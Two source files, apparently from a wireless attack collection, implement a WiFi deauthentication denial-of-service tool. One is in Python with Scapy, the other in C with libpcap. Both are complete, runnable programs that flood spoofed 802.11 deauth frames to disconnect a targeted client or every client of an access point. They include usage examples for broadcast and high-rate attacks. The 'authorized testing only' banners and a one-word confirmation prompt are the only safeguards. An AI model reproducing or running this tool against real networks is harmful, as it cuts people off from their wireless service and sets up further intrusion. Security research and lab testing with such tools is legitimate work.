File: Implementations/WiFi/DoS/deauth_attack/python/python310/deauth.py
#!/usr/bin/env python3
"""
WiFi Deauthentication Attack - Python 3.10 Implementation
==========================================================

Sends spoofed 802.11 deauthentication frames to disconnect clients from
an access point. Used for security research and dataset generation.

**WARNING**: This tool is for AUTHORIZED TESTING ONLY. Unauthorized use
is illegal under computer fraud laws in most jurisdictions.

Requirements:
    - Python 3.10+
    - Scapy 2.5.0+
    - WiFi adapter in monitor mode
    - Root/sudo privileges

Usage:
    # Target specific client
    sudo python3 deauth.py --interface wlan0mon \
                           --bssid AA:BB:CC:DD:EE:FF \
                           --client 11:22:33:44:55:66 \
                           --count 100

    # Broadcast deauth (all clients)
    sudo python3 deauth.py --interface wlan0mon \
                           --bssid AA:BB:CC:DD:EE:FF \
                           --broadcast \
                           --duration 30

Author: Wireless Security Research
License: Educational Use Only
Python Version: 3.10+ (uses match/case, type unions)
"""

import sys
import time
import argparse
import signal
from dataclasses import dataclass
from typing import Optional
import os

# Scapy imports
try:
    from scapy.all import (
        RadioTap, Dot11, Dot11Deauth,
        sendp, conf
    )
except ImportError:
    print("ERROR: Scapy not installed. Run: pip install scapy")
    sys.exit(1)

# ============================================================================
# Configuration & Constants
# ============================================================================

@dataclass
class DeauthConfig:
    """Attack configuration parameters"""
    interface: str
    bssid: str
    client: str | None = None  # Python 3.10+ type union syntax
    broadcast: bool = False
    reason: int = 7  # Reason code (7 = Class 3 frame from nonassociated STA)
    count: int | None = None
    duration: int | None = None
    rate: float = 10.0  # Packets per second
    channel: int | None = None
    capture: bool = False
    verbose: bool = True


# Reason codes for deauthentication
DEAUTH_REASONS = {
    1: "Unspecified reason",
    2: "Previous authentication no longer valid",
    3: "Deauthenticated because sending STA is leaving (or has left) IBSS or ESS",
    4: "Disassociated due to inactivity",
    5: "Disassociated because AP is unable to handle all currently associated STAs",
    6: "Class 2 frame received from nonauthenticated STA",
    7: "Class 3 frame received from nonassociated STA",
    8: "Disassociated because sending STA is leaving (or has left) BSS",
}

# ============================================================================
# Attack Implementation
# ============================================================================

class WiFiDeauthAttack:
    """WiFi Deauthentication Attack Implementation"""

    def __init__(self, config: DeauthConfig):
        self.config = config
        self.packets_sent = 0
        self.running = False
        self.start_time = 0.0

        # Setup signal handler for graceful shutdown
        signal.signal(signal.SIGINT, self._signal_handler)
        signal.signal(signal.SIGTERM, self._signal_handler)

    def _signal_handler(self, signum, frame):
        """Handle Ctrl+C for graceful shutdown"""
        print(f"\n[!] Caught signal {signum}, shutting down...")
        self.running = False

    def _validate_config(self) -> bool:
        """Validate attack configuration"""
        # Check root privileges
        if os.geteuid() != 0:
            print("[!] ERROR: This script requires root privileges")
            print("    Run with: sudo python3 deauth.py ...")
            return False

        # Validate interface exists
        if not os.path.exists(f"/sys/class/net/{self.config.interface}"):
            print(f"[!] ERROR: Interface {self.config.interface} not found")
            return False

        # Validate MAC address format
        if not self._is_valid_mac(self.config.bssid):
            print(f"[!] ERROR: Invalid BSSID format: {self.config.bssid}")
            return False

        if self.config.client and not self._is_valid_mac(self.config.client):
            print(f"[!] ERROR: Invalid client MAC format: {self.config.client}")
            return False

        # Validate count or duration specified
        if self.config.count is None and self.config.duration is None:
            print("[!] ERROR: Must specify either --count or --duration")
            return False

        return True

    @staticmethod
    def _is_valid_mac(mac: str) -> bool:
        """Validate MAC address format"""
        parts = mac.split(':')
        if len(parts) != 6:
            return False
        try:
            [int(x, 16) for x in parts]
            return True
        except ValueError:
            return False

    def _craft_deauth_packet(self, target_mac: str) -> bytes:
        """
        Craft 802.11 deauthentication frame

        Args:
            target_mac: Target client MAC address (or broadcast)

        Returns:
            Raw packet bytes
        """
        # RadioTap header (for packet injection)
        radiotap = RadioTap()

        # 802.11 header
        dot11 = Dot11(
            addr1=target_mac,           # Destination (client or broadcast)
            addr2=self.config.bssid,    # Source (AP)
            addr3=self.config.bssid     # BSSID (AP)
        )

        # Deauthentication frame
        deauth = Dot11Deauth(reason=self.config.reason)

        # Combine layers
        packet = radiotap / dot11 / deauth

        return packet

    def _send_deauth_pair(self, client_mac: str) -> None:
        """
        Send deauth in both directions (AP→Client and Client→AP)

        This is more effective as it disrupts the association in both directions.
        """
        # AP → Client
        packet1 = self._craft_deauth_packet(client_mac)
        sendp(packet1, iface=self.config.interface, verbose=False)

        # Client → AP (reversed addresses)
        radiotap = RadioTap()
        dot11 = Dot11(
            addr1=self.config.bssid,    # Destination (AP)
            addr2=client_mac,           # Source (Client)
            addr3=self.config.bssid     # BSSID (AP)
        )
        deauth = Dot11Deauth(reason=self.config.reason)
        packet2 = radiotap / dot11 / deauth
        sendp(packet2, iface=self.config.interface, verbose=False)

        self.packets_sent += 2

    def _print_status(self) -> None:
        """Print attack statistics"""
        elapsed = time.time() - self.start_time
        rate = self.packets_sent / elapsed if elapsed > 0 else 0

        print(f"\r[*] Sent: {self.packets_sent} packets | "
              f"Rate: {rate:.1f} pps | "
              f"Elapsed: {elapsed:.1f}s", end='', flush=True)

    def run(self) -> int:
        """
        Execute deauthentication attack

        Returns:
            0 on success, 1 on error
        """
        # Validation
        if not self._validate_config():
            return 1

        # Request authorization
        if not self._request_authorization():
            print("[!] Attack cancelled by user")
            return 1

        # Display attack info
        self._print_attack_info()

        # Configure Scapy
        conf.verb = 0  # Disable verbose output

        # Set channel if specified
        if self.config.channel:
            os.system(f"iw dev {self.config.interface} set channel {self.config.channel}")

        # Determine target(s)
        target_mac = "ff:ff:ff:ff:ff:ff" if self.config.broadcast else self.config.client

        # Attack loop
        self.running = True
        self.start_time = time.time()
        packet_count = 0

        try:
            while self.running:
                # Send deauth pair
                self._send_deauth_pair(target_mac)
                packet_count += 1

                # Check stop conditions
                if self.config.count and packet_count >= self.config.count:
                    break

                if self.config.duration:
                    elapsed = time.time() - self.start_time
                    if elapsed >= self.config.duration:
                        break

                # Rate limiting
                if self.config.rate > 0:
                    time.sleep(1.0 / self.config.rate)

                # Print status (every 10 packets)
                if packet_count % 10 == 0 and self.config.verbose:
                    self._print_status()

        except KeyboardInterrupt:
            print("\n[!] Attack interrupted by user")

        except Exception as e:
            print(f"\n[!] ERROR: {e}")
            return 1

        finally:
            # Print final statistics
            self._print_final_stats()

        return 0

    def _request_authorization(self) -> bool:
        """Request user confirmation before attacking"""
        print("\n" + "="*70)
        print("  WARNING: AUTHORIZATION REQUIRED")
        print("="*70)
        print("This tool will send deauthentication frames that will disconnect")
        print("wireless clients from the specified access point.")
        print("")
        print("You MUST have:")
        print("  1. Written authorization to test this network")
        print("  2. A controlled lab environment, OR")
        print("  3. Explicit permission from the network owner")
        print("")
        print("Unauthorized use is ILLEGAL and may result in:")
        print("  - Criminal prosecution")
        print("  - Civil liability")
        print("  - Network/service disruption")
        print("="*70)

        response = input("\nDo you have authorization to proceed? (yes/NO): ")
        return response.lower() in ['yes', 'y']

    def _print_attack_info(self) -> None:
        """Display attack configuration"""
        print("\n" + "="*70)
        print("  WiFi Deauthentication Attack - Configuration")
        print("="*70)
        print(f"Interface:       {self.config.interface}")
        print(f"Target BSSID:    {self.config.bssid}")
        print(f"Target Client:   {self.config.client or 'BROADCAST (all clients)'}")
        print(f"Reason Code:     {self.config.reason} - {DEAUTH_REASONS.get(self.config.reason, 'Unknown')}")
        print(f"Attack Mode:     ", end='')

        match (self.config.count, self.config.duration):
            case (count, None) if count:
                print(f"Count-based ({count} packets)")
            case (None, duration) if duration:
                print(f"Duration-based ({duration} seconds)")
            case (count, duration) if count and duration:
                print(f"Hybrid ({count} packets OR {duration} seconds)")
            case _:
                print("Unknown")

        print(f"Rate:            {self.config.rate} packets/second")
        print(f"Channel:         {self.config.channel or 'Auto (use current)'}")
        print("="*70 + "\n")

    def _print_final_stats(self) -> None:
        """Display final attack statistics"""
        elapsed = time.time() - self.start_time
        avg_rate = self.packets_sent / elapsed if elapsed > 0 else 0

        print("\n" + "="*70)
        print("  Attack Completed - Statistics")
        print("="*70)
        print(f"Total Packets:   {self.packets_sent}")
        print(f"Duration:        {elapsed:.2f} seconds")
        print(f"Average Rate:    {avg_rate:.2f} packets/second")
        print(f"Success:         Frames injected successfully")
        print("="*70 + "\n")


# ============================================================================
# CLI Interface
# ============================================================================

def parse_arguments() -> argparse.Namespace:
    """Parse command-line arguments"""
    parser = argparse.ArgumentParser(
        description="WiFi Deauthentication Attack (Python 3.10 Implementation)",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Deauth specific client (100 packets)
  sudo python3 deauth.py -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 -n 100

  # Broadcast deauth for 30 seconds
  sudo python3 deauth.py -i wlan0mon -b AA:BB:CC:DD:EE:FF --broadcast -d 30

  # High-rate attack on channel 6
  sudo python3 deauth.py -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 \\
                         -d 60 -r 50 --channel 6

Notes:
  - Requires root privileges (use sudo)
  - WiFi adapter must be in monitor mode (use: airmon-ng start wlan0)
  - For educational/authorized testing only
        """
    )

    # Required arguments
    parser.add_argument('-i', '--interface', required=True,
                       help='WiFi interface in monitor mode (e.g., wlan0mon)')
    parser.add_argument('-b', '--bssid', required=True,
                       help='Target AP BSSID (MAC address)')

    # Target selection (mutually exclusive)
    target_group = parser.add_mutually_exclusive_group(required=True)
    target_group.add_argument('-c', '--client',
                             help='Target client MAC address')
    target_group.add_argument('--broadcast', action='store_true',
                             help='Target all clients (broadcast)')

    # Attack parameters
    parser.add_argument('--reason', type=int, default=7, choices=range(1, 9),
                       help='Deauth reason code (default: 7)')

    # Duration control (at least one required)
    duration_group = parser.add_argument_group('duration control (specify at least one)')
    duration_group.add_argument('-n', '--count', type=int,
                               help='Number of deauth packets to send')
    duration_group.add_argument('-d', '--duration', type=int,
                               help='Attack duration in seconds')

    # Performance tuning
    parser.add_argument('-r', '--rate', type=float, default=10.0,
                       help='Packets per second (default: 10)')
    parser.add_argument('--channel', type=int,
                       help='WiFi channel (auto-detected if not specified)')

    # Options
    parser.add_argument('--capture', action='store_true',
                       help='Capture traffic during attack (requires tcpdump)')
    parser.add_argument('-q', '--quiet', action='store_true',
                       help='Quiet mode (minimal output)')
    parser.add_argument('-v', '--version', action='version',
                       version='WiFi Deauth Attack v1.0 (Python 3.10)')

    return parser.parse_args()


def main() -> int:
    """Main entry point"""
    # Parse arguments
    args = parse_arguments()

    # Create configuration
    config = DeauthConfig(
        interface=args.interface,
        bssid=args.bssid,
        client=args.client,
        broadcast=args.broadcast,
        reason=args.reason,
        count=args.count,
        duration=args.duration,
        rate=args.rate,
        channel=args.channel,
        capture=args.capture,
        verbose=not args.quiet
    )

    # Create and run attack
    attack = WiFiDeauthAttack(config)
    return attack.run()


if __name__ == '__main__':
    sys.exit(main())

File: Implementations/WiFi/DoS/deauth_attack/c/deauth.c
/*
 * WiFi Deauthentication Attack - C Implementation
 * =================================================
 *
 * High-performance implementation using raw sockets and libpcap.
 * Provides maximum control and minimal overhead.
 *
 * WARNING: This tool is for AUTHORIZED TESTING ONLY.
 *
 * Requirements:
 *   - libpcap-dev
 *   - Linux with wireless extensions
 *   - Root privileges
 *   - WiFi adapter in monitor mode
 *
 * Compilation:
 *   gcc -o deauth deauth.c -lpcap -O3
 *   sudo ./deauth --help
 *
 * Author: Wireless Security Research
 * License: Educational Use Only
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <time.h>
#include <errno.h>
#include <pcap.h>
#include <sys/types.h>
#include <arpa/inet.h>

/* ========================================================================
 * Constants & Configuration
 * ======================================================================== */

#define VERSION "1.0"
#define MAX_PACKET_SIZE 2048
#define DEFAULT_REASON 7
#define DEFAULT_RATE 10.0

/* 802.11 Frame Control field values */
#define IEEE80211_FTYPE_MGMT 0x00
#define IEEE80211_STYPE_DEAUTH 0xC0

/* Global state for signal handling */
static volatile int g_running = 1;
static unsigned long g_packets_sent = 0;

/* ========================================================================
 * Data Structures
 * ======================================================================== */

/* Attack configuration */
typedef struct {
    char interface[32];
    unsigned char bssid[6];
    unsigned char client[6];
    int broadcast;
    int reason;
    unsigned long count;
    unsigned long duration;
    double rate;
    int channel;
    int verbose;
} attack_config_t;

/* 802.11 Radiotap Header (simplified) */
struct ieee80211_radiotap_header {
    uint8_t it_version;
    uint8_t it_pad;
    uint16_t it_len;
    uint32_t it_present;
} __attribute__((packed));

/* 802.11 Management Frame Header */
struct ieee80211_mgmt_hdr {
    uint16_t frame_control;
    uint16_t duration;
    uint8_t  da[6];  /* Destination address */
    uint8_t  sa[6];  /* Source address */
    uint8_t  bssid[6];
    uint16_t seq_ctrl;
} __attribute__((packed));

/* Deauthentication frame body */
struct ieee80211_deauth {
    uint16_t reason_code;
} __attribute__((packed));

/* Complete deauth packet */
struct deauth_packet {
    struct ieee80211_radiotap_header radiotap;
    struct ieee80211_mgmt_hdr mgmt;
    struct ieee80211_deauth deauth;
} __attribute__((packed));

/* ========================================================================
 * Signal Handling
 * ======================================================================== */

void signal_handler(int signum) {
    printf("\n[!] Caught signal %d, shutting down...\n", signum);
    g_running = 0;
}

void setup_signal_handlers(void) {
    signal(SIGINT, signal_handler);
    signal(SIGTERM, signal_handler);
}

/* ========================================================================
 * Utility Functions
 * ======================================================================== */

/* Parse MAC address from string "AA:BB:CC:DD:EE:FF" */
int parse_mac(const char *str, unsigned char *mac) {
    int values[6];
    int i;

    if (sscanf(str, "%x:%x:%x:%x:%x:%x",
               &values[0], &values[1], &values[2],
               &values[3], &values[4], &values[5]) != 6) {
        return -1;
    }

    for (i = 0; i < 6; i++) {
        mac[i] = (unsigned char) values[i];
    }

    return 0;
}

/* Print MAC address */
void print_mac(const unsigned char *mac) {
    printf("%02X:%02X:%02X:%02X:%02X:%02X",
           mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]);
}

/* Check if running as root */
int check_root(void) {
    if (geteuid() != 0) {
        fprintf(stderr, "[!] ERROR: This program requires root privileges\n");
        fprintf(stderr, "    Run with: sudo %s\n", program_invocation_name);
        return -1;
    }
    return 0;
}

/* Request authorization */
int request_authorization(void) {
    char response[10];

    printf("\n");
    printf("======================================================================\n");
    printf("  WARNING: AUTHORIZATION REQUIRED\n");
    printf("======================================================================\n");
    printf("This tool will send deauthentication frames that will disconnect\n");
    printf("wireless clients from the specified access point.\n");
    printf("\n");
    printf("You MUST have written authorization to proceed.\n");
    printf("Unauthorized use is ILLEGAL.\n");
    printf("======================================================================\n");
    printf("\nDo you have authorization to proceed? (yes/NO): ");

    if (fgets(response, sizeof(response), stdin) == NULL) {
        return 0;
    }

    return (strncasecmp(response, "yes", 3) == 0 ||
            strncasecmp(response, "y", 1) == 0);
}

/* ========================================================================
 * Packet Crafting
 * ======================================================================== */

/* Craft deauthentication packet */
void craft_deauth_packet(struct deauth_packet *pkt,
                         const unsigned char *dst,
                         const unsigned char *src,
                         const unsigned char *bssid,
                         uint16_t reason) {
    /* Zero out packet */
    memset(pkt, 0, sizeof(*pkt));

    /* Radiotap header */
    pkt->radiotap.it_version = 0;
    pkt->radiotap.it_pad = 0;
    pkt->radiotap.it_len = htole16(sizeof(struct ieee80211_radiotap_header));
    pkt->radiotap.it_present = 0;

    /* 802.11 management header */
    pkt->mgmt.frame_control = htole16(IEEE80211_FTYPE_MGMT | IEEE80211_STYPE_DEAUTH);
    pkt->mgmt.duration = 0;
    memcpy(pkt->mgmt.da, dst, 6);
    memcpy(pkt->mgmt.sa, src, 6);
    memcpy(pkt->mgmt.bssid, bssid, 6);
    pkt->mgmt.seq_ctrl = 0;

    /* Deauth frame body */
    pkt->deauth.reason_code = htole16(reason);
}

/* ========================================================================
 * Attack Implementation
 * ======================================================================== */

/* Send deauth packet pair (bidirectional) */
int send_deauth_pair(pcap_t *handle,
                     const attack_config_t *config,
                     const unsigned char *target) {
    struct deauth_packet pkt;
    int ret;

    /* AP → Client */
    craft_deauth_packet(&pkt, target, config->bssid, config->bssid, config->reason);
    ret = pcap_inject(handle, &pkt, sizeof(pkt));
    if (ret < 0) {
        fprintf(stderr, "[!] pcap_inject failed: %s\n", pcap_geterr(handle));
        return -1;
    }

    /* Client → AP */
    craft_deauth_packet(&pkt, config->bssid, target, config->bssid, config->reason);
    ret = pcap_inject(handle, &pkt, sizeof(pkt));
    if (ret < 0) {
        fprintf(stderr, "[!] pcap_inject failed: %s\n", pcap_geterr(handle));
        return -1;
    }

    g_packets_sent += 2;
    return 0;
}

/* Print attack statistics */
void print_status(time_t start_time) {
    time_t elapsed = time(NULL) - start_time;
    double rate = elapsed > 0 ? (double)g_packets_sent / elapsed : 0.0;

    printf("\r[*] Sent: %lu packets | Rate: %.1f pps | Elapsed: %ld s",
           g_packets_sent, rate, elapsed);
    fflush(stdout);
}

/* Main attack loop */
int run_attack(const attack_config_t *config) {
    pcap_t *handle;
    char errbuf[PCAP_ERRBUF_SIZE];
    unsigned char target[6];
    time_t start_time;
    unsigned long packet_count = 0;
    struct timespec sleep_time;
    int ret;

    /* Open pcap handle */
    handle = pcap_open_live(config->interface, MAX_PACKET_SIZE, 1, 1000, errbuf);
    if (handle == NULL) {
        fprintf(stderr, "[!] pcap_open_live failed: %s\n", errbuf);
        return -1;
    }

    /* Set monitor mode */
    if (pcap_set_rfmon(handle, 1) != 0) {
        fprintf(stderr, "[!] Warning: Failed to set monitor mode\n");
    }

    /* Determine target MAC */
    if (config->broadcast) {
        memset(target, 0xFF, 6);  /* Broadcast */
    } else {
        memcpy(target, config->client, 6);
    }

    /* Calculate sleep time for rate limiting */
    if (config->rate > 0) {
        sleep_time.tv_sec = 0;
        sleep_time.tv_nsec = (long)(1000000000.0 / config->rate);
    }

    /* Attack loop */
    start_time = time(NULL);
    g_running = 1;

    while (g_running) {
        /* Send deauth pair */
        ret = send_deauth_pair(handle, config, target);
        if (ret < 0) {
            break;
        }

        packet_count++;

        /* Check stop conditions */
        if (config->count > 0 && packet_count >= config->count) {
            break;
        }

        if (config->duration > 0) {
            if ((time(NULL) - start_time) >= config->duration) {
                break;
            }
        }

        /* Rate limiting */
        if (config->rate > 0) {
            nanosleep(&sleep_time, NULL);
        }

        /* Print status every 10 packets */
        if (config->verbose && (packet_count % 10 == 0)) {
            print_status(start_time);
        }
    }

    /* Final statistics */
    if (config->verbose) {
        time_t elapsed = time(NULL) - start_time;
        double avg_rate = elapsed > 0 ? (double)g_packets_sent / elapsed : 0.0;

        printf("\n\n");
        printf("======================================================================\n");
        printf("  Attack Completed - Statistics\n");
        printf("======================================================================\n");
        printf("Total Packets:   %lu\n", g_packets_sent);
        printf("Duration:        %ld seconds\n", elapsed);
        printf("Average Rate:    %.2f packets/second\n", avg_rate);
        printf("======================================================================\n\n");
    }

    pcap_close(handle);
    return 0;
}

/* ========================================================================
 * CLI & Main
 * ======================================================================== */

void print_usage(const char *prog) {
    printf("WiFi Deauthentication Attack - C Implementation v%s\n\n", VERSION);
    printf("Usage: %s [OPTIONS]\n\n", prog);
    printf("Required:\n");
    printf("  -i <interface>     WiFi interface in monitor mode\n");
    printf("  -b <BSSID>         Target AP BSSID (MAC address)\n");
    printf("  -c <client>        Target client MAC address\n");
    printf("  OR\n");
    printf("  --broadcast        Target all clients (broadcast)\n\n");
    printf("Optional:\n");
    printf("  --reason <code>    Deauth reason code (default: 7)\n");
    printf("  -n <count>         Number of packets to send\n");
    printf("  -d <duration>      Attack duration in seconds\n");
    printf("  -r <rate>          Packets per second (default: 10.0)\n");
    printf("  --channel <ch>     WiFi channel\n");
    printf("  -q                 Quiet mode\n");
    printf("  -h, --help         Show this help\n\n");
    printf("Examples:\n");
    printf("  sudo %s -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 -n 100\n", prog);
    printf("  sudo %s -i wlan0mon -b AA:BB:CC:DD:EE:FF --broadcast -d 30\n\n", prog);
}

int main(int argc, char *argv[]) {
    attack_config_t config = {0};
    int opt;
    int i;

    /* Default values */
    config.reason = DEFAULT_REASON;
    config.rate = DEFAULT_RATE;
    config.verbose = 1;

    /* Parse arguments */
    for (i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-i") == 0 && i + 1 < argc) {
            strncpy(config.interface, argv[++i], sizeof(config.interface) - 1);
        } else if (strcmp(argv[i], "-b") == 0 && i + 1 < argc) {
            if (parse_mac(argv[++i], config.bssid) < 0) {
                fprintf(stderr, "[!] Invalid BSSID format\n");
                return 1;
            }
        } else if (strcmp(argv[i], "-c") == 0 && i + 1 < argc) {
            if (parse_mac(argv[++i], config.client) < 0) {
                fprintf(stderr, "[!] Invalid client MAC format\n");
                return 1;
            }
        } else if (strcmp(argv[i], "--broadcast") == 0) {
            config.broadcast = 1;
        } else if (strcmp(argv[i], "--reason") == 0 && i + 1 < argc) {
            config.reason = atoi(argv[++i]);
        } else if (strcmp(argv[i], "-n") == 0 && i + 1 < argc) {
            config.count = atol(argv[++i]);
        } else if (strcmp(argv[i], "-d") == 0 && i + 1 < argc) {
            config.duration = atol(argv[++i]);
        } else if (strcmp(argv[i], "-r") == 0 && i + 1 < argc) {
            config.rate = atof(argv[++i]);
        } else if (strcmp(argv[i], "--channel") == 0 && i + 1 < argc) {
            config.channel = atoi(argv[++i]);
        } else if (strcmp(argv[i], "-q") == 0) {
            config.verbose = 0;
        } else if (strcmp(argv[i], "-h") == 0 || strcmp(argv[i], "--help") == 0) {
            print_usage(argv[0]);
            return 0;
        }
    }

    /* Validate required arguments */
    if (strlen(config.interface) == 0) {
        fprintf(stderr, "[!] Missing required argument: -i <interface>\n");
        print_usage(argv[0]);
        return 1;
    }

    if (config.bssid[0] == 0 && config.bssid[1] == 0) {
        fprintf(stderr, "[!] Missing required argument: -b <BSSID>\n");
        print_usage(argv[0]);
        return 1;
    }

    if (!config.broadcast && (config.client[0] == 0 && config.client[1] == 0)) {
        fprintf(stderr, "[!] Must specify either -c <client> or --broadcast\n");
        print_usage(argv[0]);
        return 1;
    }

    if (config.count == 0 && config.duration == 0) {
        fprintf(stderr, "[!] Must specify either -n <count> or -d <duration>\n");
        return 1;
    }

    /* Check root */
    if (check_root() < 0) {
        return 1;
    }

    /* Request authorization */
    if (!request_authorization()) {
        printf("[!] Attack cancelled by user\n");
        return 1;
    }

    /* Setup signal handlers */
    setup_signal_handlers();

    /* Print configuration */
    if (config.verbose) {
        printf("\n======================================================================\n");
        printf("  WiFi Deauthentication Attack - Configuration\n");
        printf("======================================================================\n");
        printf("Interface:       %s\n", config.interface);
        printf("Target BSSID:    ");
        print_mac(config.bssid);
        printf("\nTarget Client:   ");
        if (config.broadcast) {
            printf("BROADCAST (all clients)");
        } else {
            print_mac(config.client);
        }
        printf("\nReason Code:     %d\n", config.reason);
        printf("Count:           %lu packets\n", config.count);
        printf("Duration:        %lu seconds\n", config.duration);
        printf("Rate:            %.1f pps\n", config.rate);
        printf("======================================================================\n\n");
    }

    /* Run attack */
    return run_attack(&config);
}
